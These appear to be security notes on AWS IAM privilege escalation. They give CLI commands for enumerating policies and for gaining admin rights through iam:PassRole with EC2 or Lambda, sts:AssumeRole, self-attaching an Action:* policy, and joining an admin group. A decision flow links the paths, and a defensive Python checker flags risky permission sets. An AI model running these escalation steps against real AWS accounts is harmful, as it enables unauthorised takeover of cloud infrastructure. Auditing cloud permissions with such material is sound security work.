1. Key AWS Concepts
1) IAM (Identity and Access Management)
- Users: Actual people or systems that access AWS.
- Roles: Permission sets that can be assumed temporarily.
- Policies: JSON documents that define what actions are allowed or denied.
- Groups: Collections of users that share permissions.
2) Important AWS Services for Privilege Escalation
- STS (Security Token Service): Used to assume roles.
- EC2: Virtual machines running on AWS.
- Lambda: Serverless functions.
- IAM: Manages user, role, and group permissions.
2. Checking IAM Policies & Determining Privilege Escalation Paths
1) Check Attached Policies
aws iam list-attached-user-policies --user-name myuser
- This lists managed policies attached directly to the user only; inline user policies and policies attached to the user's groups are not shown here.
- Example Output:
{
  "AttachedPolicies": [
    {
      "PolicyName": "MyCustomPolicy",
      "PolicyArn": "arn:aws:iam::123456789012:policy/MyCustomPolicy"
    }
  ]
}
2) Check Policy Details
aws iam get-policy-version \
--policy-arn arn:aws:iam::123456789012:policy/MyCustomPolicy \
--version-id v1
- To find the version ID:
aws iam list-policy-versions --policy-arn arn:aws:iam::123456789012:policy/MyCustomPolicy
3) Choose privilege escalation techniques based on the output
(1) iam:PassRole
- Lets the caller pass a role (including an admin role) to an AWS service, which then runs with that role's permissions. Look for a statement like this in the policy:
{
  "Effect": "Allow",
  "Action": "iam:PassRole",
  "Resource": "*"
}
a. Path1 - ec2:RunInstances
- Attach an admin role to an EC2 instance.
a) Check EC2 Permissions (simulate-principal-policy takes the principal's ARN via --policy-source-arn, not a policy ARN)
aws iam simulate-principal-policy \
--policy-source-arn arn:aws:iam::123456789012:user/myuser \
--action-names ec2:RunInstances
b) Run an EC2 instance with the admin role
aws ec2 run-instances \
--image-id ami-12345678 \
--instance-type t2.micro \
--iam-instance-profile Name=AdminRole \
--key-name MyKey \
--security-groups default
b. Path2 - lambda:CreateFunction + lambda:InvokeFunction
- Execute code as admin via Lambda.
a) Check Lambda permissions (again with the principal's ARN in --policy-source-arn)
aws iam simulate-principal-policy \
--policy-source-arn arn:aws:iam::123456789012:user/myuser \
--action-names lambda:CreateFunction lambda:InvokeFunction
b) Create a Lambda function with the admin role
aws lambda create-function \
--function-name escalateMe \
--runtime python3.8 \
--role arn:aws:iam::123456789012:role/AdminRole \
--handler lambda_function.lambda_handler \
--zip-file fileb://function.zip
c) Invoke the Lambda function
aws lambda invoke --function-name escalateMe output.txt
(2) sts:AssumeRole
- Directly assume an admin role. Note that sts:AssumeRole on the caller's side is not sufficient by itself: the target role's trust policy must also allow the calling principal.
aws sts assume-role --role-arn arn:aws:iam::123456789012:role/AdminRole --role-session-name tryit
- If successful, the output provides temporary admin credentials.
- Export them as environment variables to use the new permissions in your session:
export AWS_ACCESS_KEY_ID="Your_Access_Key_ID"
export AWS_SECRET_ACCESS_KEY="Your_Secret_Access_Key"
export AWS_SESSION_TOKEN="Your_Session_Token"
(3) iam:CreatePolicy + iam:AttachUserPolicy
- Create a new admin policy and attach it to yourself.
a. Create an admin policy JSON file
echo '{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": "*",
      "Resource": "*"
    }
  ]
}' > admin-policy.json
b. Upload the new policy to AWS
aws iam create-policy \
--policy-name MyAdminPolicy \
--policy-document file://admin-policy.json
c. Attach the policy to your account
aws iam attach-user-policy \
--user-name myuser \
--policy-arn arn:aws:iam::123456789012:policy/MyAdminPolicy
d. Verify you have admin permissions
aws iam list-attached-user-policies --user-name myuser
(4) iam:AddUserToGroup
- Add yourself to an admin group.
a. Check available groups
aws iam list-groups
b. Check if a group has admin privileges
aws iam list-attached-group-policies --group-name AdminGroup
c. Add yourself to an admin group
aws iam add-user-to-group --user-name myuser --group-name AdminGroup
d. Verify you are in the admin group
aws iam list-groups-for-user --user-name myuser
3. Full Privilege Escalation Flow
1) Check attached policies
(1) AdministratorAccess exists -> You are already admin.
(2) 'iam:PassRole' exists?
a. 'ec2:RunInstances' allowed -> Use the EC2 method.
b. 'lambda:CreateFunction' (with 'lambda:InvokeFunction') allowed -> Use the Lambda method.
(3) 'sts:AssumeRole' exists? -> Assume the role directly.
(4) 'iam:CreatePolicy' + 'iam:AttachUserPolicy' exist? -> Create and attach an admin policy.
(5) 'iam:AddUserToGroup' exists? -> Add yourself to the admin group.
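As an added example that is not part of these notes, the following Python check applies the decision flow above to a policy document (the JSON returned by get-policy-version) and reports which paths its statements enable, honouring explicit Deny and '*' wildcards the way IAM evaluates them; a defender can run it over every policy in an account to find the risky permission combinations. It inspects the Action element only, so Resource and Condition scoping are ignored and the result is an upper bound; the sample policy at the bottom is constructed.

```python
import fnmatch

# Permission sets from the flow above; every action in a set must be allowed
# for that path to apply. "*" stands for AdministratorAccess-equivalent access.
ESCALATION_PATHS = {
    "already admin": ["*"],
    "iam:PassRole + ec2:RunInstances (EC2 method)": ["iam:PassRole", "ec2:RunInstances"],
    "iam:PassRole + lambda:CreateFunction/InvokeFunction (Lambda method)":
        ["iam:PassRole", "lambda:CreateFunction", "lambda:InvokeFunction"],
    "sts:AssumeRole": ["sts:AssumeRole"],
    "iam:CreatePolicy + iam:AttachUserPolicy": ["iam:CreatePolicy", "iam:AttachUserPolicy"],
    "iam:AddUserToGroup": ["iam:AddUserToGroup"],
}

def _as_list(value):
    return value if isinstance(value, list) else [value]

def split_actions(policy):
    """Collect lower-cased Allow and Deny action patterns from a policy document.
    Only Action is read; Resource/Condition scoping is ignored (upper bound)."""
    allow, deny = [], []
    for stmt in _as_list(policy.get("Statement", [])):
        if "Action" not in stmt:
            continue  # NotAction statements are not expanded here
        bucket = allow if stmt.get("Effect") == "Allow" else deny
        bucket.extend(a.lower() for a in _as_list(stmt["Action"]))
    return allow, deny

def action_is_allowed(action, allow, deny):
    """IAM semantics: an explicit Deny beats any Allow; '*' and '?' are wildcards."""
    if action == "*":  # full admin needs an unrestricted Allow and no Deny at all
        return "*" in allow and not deny
    action = action.lower()
    if any(fnmatch.fnmatchcase(action, p) for p in deny):
        return False
    return any(fnmatch.fnmatchcase(action, p) for p in allow)

def find_escalation_paths(policy):
    """Return the names of the paths above whose full permission set is allowed."""
    allow, deny = split_actions(policy)
    return [name for name, actions in ESCALATION_PATHS.items()
            if all(action_is_allowed(a, allow, deny) for a in actions)]

# Constructed sample (not from the notes): lambda:* granted but InvokeFunction denied,
# so only the EC2 path is open.
SAMPLE_POLICY = {"Statement": [
    {"Effect": "Allow", "Action": ["iam:PassRole", "ec2:RunInstances", "lambda:*"], "Resource": "*"},
    {"Effect": "Deny", "Action": "lambda:InvokeFunction", "Resource": "*"},
]}
```

Feed it `json.load` of each default policy version; a non-empty result is the signal to review that policy's Resource and Condition scoping by hand.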